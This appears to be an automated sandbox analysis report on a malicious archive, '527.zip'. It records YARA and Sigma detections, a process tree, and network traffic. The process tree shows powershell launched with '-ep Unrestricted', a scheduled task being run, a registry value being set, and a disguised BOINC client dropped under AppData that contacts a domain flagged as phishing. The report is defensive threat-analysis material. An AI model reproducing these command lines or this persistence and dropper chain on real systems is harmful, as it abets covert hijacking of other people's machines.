Windows Analysis Report
527.zip

Overview

General Information

Sample name: 527.zip
Analysis ID: 1591248
MD5: 1dc9e620c33fdac7f64b77d3d3b04320
SHA1: 711b4d244f01ea086988585845a1ebd221bf12d8
SHA256: e97a452ea76479618ea4794027179a1f0d02f0c3b485c45468134386caad39de

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Sigma detected: Potentially Suspicious PowerShell Child Processes
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Connects to many different domains
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64_ra
  • rundll32.exe (PID: 936 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • firefox.exe (PID: 5932 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • firefox.exe (PID: 876 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • firefox.exe (PID: 1884 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2304 -parentBuildID 20230927232528 -prefsHandle 2252 -prefMapHandle 2248 -prefsLen 25250 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7aecee2f-7929-4b59-a925-084c7a102dc1} 876 "\\.\pipe\gecko-crash-server-pipe.876" 1ca7b26d510 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • firefox.exe (PID: 4516 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3848 -parentBuildID 20230927232528 -prefsHandle 2524 -prefMapHandle 2520 -prefsLen 25402 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a34be315-eacf-430b-91ce-f68b9a07f9bb} 876 "\\.\pipe\gecko-crash-server-pipe.876" 1ca0b1e6b10 rdd MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • firefox.exe (PID: 7384 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5460 -parentBuildID 20230927232528 -sandboxingKind 0 -prefsHandle 5388 -prefMapHandle 5424 -prefsLen 33076 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {12e0202d-ddff-4bd9-9b19-74adcc901a75} 876 "\\.\pipe\gecko-crash-server-pipe.876" 1ca1b118b10 utility MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • chrome.exe (PID: 1388 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6592 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1976,i,16268402640929927935,18277506038604385706,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • 7zG.exe (PID: 7572 cmdline: "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Desktop\527\" -spe -an -ai#7zMap22896:62:7zEvent18695 MD5: 50F289DF0C19484E970849AAC4E6F977)
  • cmd.exe (PID: 8044 cmdline: "C:\Windows\system32\cmd.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 4048 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5740 cmdline: "C:\Windows\system32\cmd.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5500 cmdline: powershell -ep Unrestricted MD5: 04029E121A0CFA5991749937DD22A1D9)
        • schtasks.exe (PID: 3356 cmdline: "C:\Windows\system32\schtasks.exe" /run /tn CleanUpMgrTask_1659166102 MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • powershell.exe (PID: 2088 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-ItemProperty -Path "HKCU:\Software\Microsoft" -Name ExpirienceHost -Value 1 MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 7776 cmdline: "C:\Windows\system32\cmd.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2872 cmdline: powershell -ep Unrestricted MD5: 04029E121A0CFA5991749937DD22A1D9)
  • .exe (PID: 4204 cmdline: "C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe" --detach_console MD5: 760F00E30887017CDEA9809FD1C38E52)
    • conhost.exe (PID: 852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • .exe (PID: 1276 cmdline: "C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe" -detach_phase_two MD5: 760F00E30887017CDEA9809FD1C38E52)
      • conhost.exe (PID: 2140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • .exe (PID: 6128 cmdline: "C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe" --detect_gpus --dir "C:\Users\user\AppData\Roaming\Licensing Validator Updater" MD5: 760F00E30887017CDEA9809FD1C38E52)
        • conhost.exe (PID: 7516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source: amsi64_5500.amsi.csv
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0x313508:$b2: ::FromBase64String(
  • 0x314190:$b2: ::FromBase64String(
  • 0x863b:$s1: -join
  • 0x1de7:$s4: +=
  • 0x1ea9:$s4: +=
  • 0x60d0:$s4: +=
  • 0x81ed:$s4: +=
  • 0x84d7:$s4: +=
  • 0x861d:$s4: +=
  • 0xa842:$s4: +=
  • 0xa8c2:$s4: +=
  • 0xa988:$s4: +=
  • 0xaa08:$s4: +=
  • 0xabde:$s4: +=
  • 0xac62:$s4: +=
  • 0x8d2b:$e4: Get-WmiObject
  • 0x8f1a:$e4: Get-Process
  • 0x8f72:$e4: Start-Process

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\schtasks.exe" /run /tn CleanUpMgrTask_1659166102, CommandLine: "C:\Windows\system32\schtasks.exe" /run /tn CleanUpMgrTask_1659166102, CommandLine|base64offset|contains: , Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: powershell -ep Unrestricted, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5500, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /run /tn CleanUpMgrTask_1659166102, ProcessId: 3356, ProcessName: schtasks.exe
Source: Process started, Author: frack113: Data: Command: powershell -ep Unrestricted, CommandLine: powershell -ep Unrestricted, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5740, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ep Unrestricted, ProcessId: 5500, ProcessName: powershell.exe
Source: File created, Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5500, TargetFilename: C:\Users\user\AppData\Roaming\Licensing Validator Updater\boinc.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5728, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" , ProcessId: 4048, ProcessName: powershell.exe
No Suricata rule has matched

AV Detection

Source: http://rosettahome.top/rosettahome_cgi/cgi Avira URL Cloud: Label: phishing
Source: .exe, 0000001F.00000000.2189132953.00007FF68D3CC000.00000002.00000001.01000000.00000010.sdmp Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_03cc715d-e
Source: Binary string: webauthn.pdb source: firefox.exe, 00000003.00000003.1538788517.000001CA1BAC1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: z:\task_1551543573\build\openh264\gmpopenh264.pdbV source: firefox.exe, 00000003.00000003.1952895724.000001CA1A100000.00000004.00000800.00020000.00000000.sdmp, gmpopenh264.dll.tmp.3.dr
Source: Binary string: wshbth.pdbGCTL source: firefox.exe, 00000003.00000003.1570383225.000001CA0AED5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: NapiNSP.pdbUGP source: firefox.exe, 00000003.00000003.1564490151.000001CA0AECA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pnrpnsp.pdb source: firefox.exe, 00000003.00000003.1565617150.000001CA0AED5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wshbth.pdb source: firefox.exe, 00000003.00000003.1570383225.000001CA0AED5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: NapiNSP.pdb source: firefox.exe, 00000003.00000003.1564490151.000001CA0AECA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: z:\task_1551543573\build\openh264\gmpopenh264.pdb source: firefox.exe, 00000003.00000003.1952895724.000001CA1A100000.00000004.00000800.00020000.00000000.sdmp, gmpopenh264.dll.tmp.3.dr
Source: Binary string: netprofm.pdb source: firefox.exe, 00000003.00000003.1566110673.000001CA1BAC1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: webauthn.pdbGCTL source: firefox.exe, 00000003.00000003.1538788517.000001CA1BAC1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pnrpnsp.pdbUGP source: firefox.exe, 00000003.00000003.1565617150.000001CA0AED5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: netprofm.pdbUGP source: firefox.exe, 00000003.00000003.1566110673.000001CA1BAC1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\boinc\boinc\win_build\Build\x64\Release\boinc_exe.pdb source: .exe, 0000001F.00000000.2189132953.00007FF68D3CC000.00000002.00000001.01000000.00000010.sdmp
Source: C:\Windows\System32\conhost.exe File opened: C:\Users\user
Source: C:\Windows\System32\conhost.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\conhost.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\conhost.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\conhost.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\conhost.exe File opened: C:\Users\user\AppData
Source: firefox.exe Memory has grown: Private usage: 0MB later: 278MB
Source: unknown Network traffic detected: DNS query count 34
Source: Joe Sandbox View IP Address: 151.101.129.91 151.101.129.91
Source: Joe Sandbox View IP Address: 34.117.188.166 34.117.188.166
Source: Joe Sandbox View IP Address: 34.149.100.209 34.149.100.209
Source: Joe Sandbox View JA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 19:46:34 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Mon, 26 Jul 1997 05:00:00 UTC Last-Modified: Tue, 14 Jan 2025 19:46:34 UTC Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 1512 Content-Type: text/html; charset=utf-8
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 19:46:41 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 908 Content-Type: text/xml
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 19:46:43 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Tue, 14 Jan 2025 19:46:43 GMT Last-Modified: Tue, 14 Jan 2025 19:46:43 GMT Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 232 Content-Type: application/xml
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 19:46:48 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Mon, 26 Jul 1997 05:00:00 UTC Last-Modified: Tue, 14 Jan 2025 19:46:48 UTC Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 1512 Content-Type: text/html; charset=utf-8
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 19:46:56 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 691 Content-Type: text/xml
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlaHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlaHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /rosettahome/ HTTP/1.1Host: rosettahome.topUser-Agent: BOINC client (windows_x86_64 8.0.2)Accept: */*Accept-Encoding: deflate, gzip
Source: global trafficHTTP traffic detected: GET /rosettahome/notices.php?userid=1&auth=1_1a362b2ad50985e203845fe44682096e HTTP/1.1Host: rosettahome.cnUser-Agent: BOINC client (windows_x86_64 8.0.2)Accept: */*Accept-Encoding: deflate, gzip
Source: global trafficHTTP traffic detected: GET /rosettahome/ HTTP/1.1Host: rosettahome.cnUser-Agent: BOINC client (windows_x86_64 8.0.2)Accept: */*Accept-Encoding: deflate, gzip
Source: firefox.exe, 00000003.00000003.1634791308.000036FD10303000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *://www.facebook.com/*Z equals www.facebook.com (Facebook)
Source: firefox.exe, 00000003.00000003.1634791308.000036FD10303000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.facebook.comZ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000003.00000003.1634791308.000036FD10303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1518246632.000001CA1B33C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *://www.facebook.com/* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000003.00000003.1524889211.000001CA7FE5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Wikipedia&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Reddit&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Twitter&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder 
hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 00000003.00000003.1528174370.000001CA1B18E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1616308895.000001CA1B229000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1690517734.000001CA1B24C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 8*://www.facebook.com/* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000003.00000003.1525109650.000001CA1B745000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1525109650.000001CA1B738000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1655358693.000001CA1B745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 8*://www.youtube.com/* equals www.youtube.com (Youtube)
Source: firefox.exe, 00000003.00000003.1528174370.000001CA1B18E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1616308895.000001CA1B229000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1690517734.000001CA1B24C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000003.00000003.1525109650.000001CA1B745000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1525109650.000001CA1B738000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1655358693.000001CA1B745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 8www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 0000000A.00000002.2641868178.0000012918A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000000A.00000002.2641868178.0000012918A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000000A.00000002.2641868178.0000012918A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000003.00000003.1700724596.000001CA154AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2641324645.000002712580A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2641868178.0000012918A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000003.00000003.1700724596.000001CA154AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2641324645.000002712580A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2641868178.0000012918A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000003.00000003.1700724596.000001CA154AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2641324645.000002712580A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2641868178.0000012918A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000003.00000003.1655358693.000001CA1B73F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1530625461.000001CA1B740000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1525109650.000001CA1B738000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: moz-extension://06836808-3da5-4b66-93b7-b66b1a840a96/injections/js/bug1842437-www.youtube.com-performance-now-precision.js equals www.youtube.com (Youtube)
Source: firefox.exe, 00000003.00000003.1931036412.000001CA0EE4B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1528174370.000001CA1B18E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1819855742.000001CA0C5DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000003.00000003.1819855742.000001CA0C5DA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1705327159.000001CA0EE4A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1747695843.000001CA0BE33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000003.00000003.1727039209.000001CA0C55C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com- equals www.youtube.com (Youtube)
Source: firefox.exe, 00000003.00000003.1672954302.000001CA0F12C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global trafficDNS traffic detected: DNS query: apis.google.com
Source: global trafficDNS traffic detected: DNS query: detectportal.firefox.com
Source: global trafficDNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global trafficDNS traffic detected: DNS query: play.google.com
Source: global trafficDNS traffic detected: DNS query: example.org
Source: global trafficDNS traffic detected: DNS query: ipv4only.arpa
Source: global trafficDNS traffic detected: DNS query: contile.services.mozilla.com
Source: global trafficDNS traffic detected: DNS query: www.youtube.com
Source: global trafficDNS traffic detected: DNS query: www.facebook.com
Source: global trafficDNS traffic detected: DNS query: www.wikipedia.org
Source: global trafficDNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global trafficDNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global trafficDNS traffic detected: DNS query: dyna.wikimedia.org
Source: global trafficDNS traffic detected: DNS query: spocs.getpocket.com
Source: global trafficDNS traffic detected: DNS query: www.reddit.com
Source: global trafficDNS traffic detected: DNS query: twitter.com
Source: global trafficDNS traffic detected: DNS query: dualstack.reddit.map.fastly.net
Source: global trafficDNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global trafficDNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global trafficDNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global trafficDNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global trafficDNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global trafficDNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global trafficDNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global trafficDNS traffic detected: DNS query: push.services.mozilla.com
Source: global trafficDNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
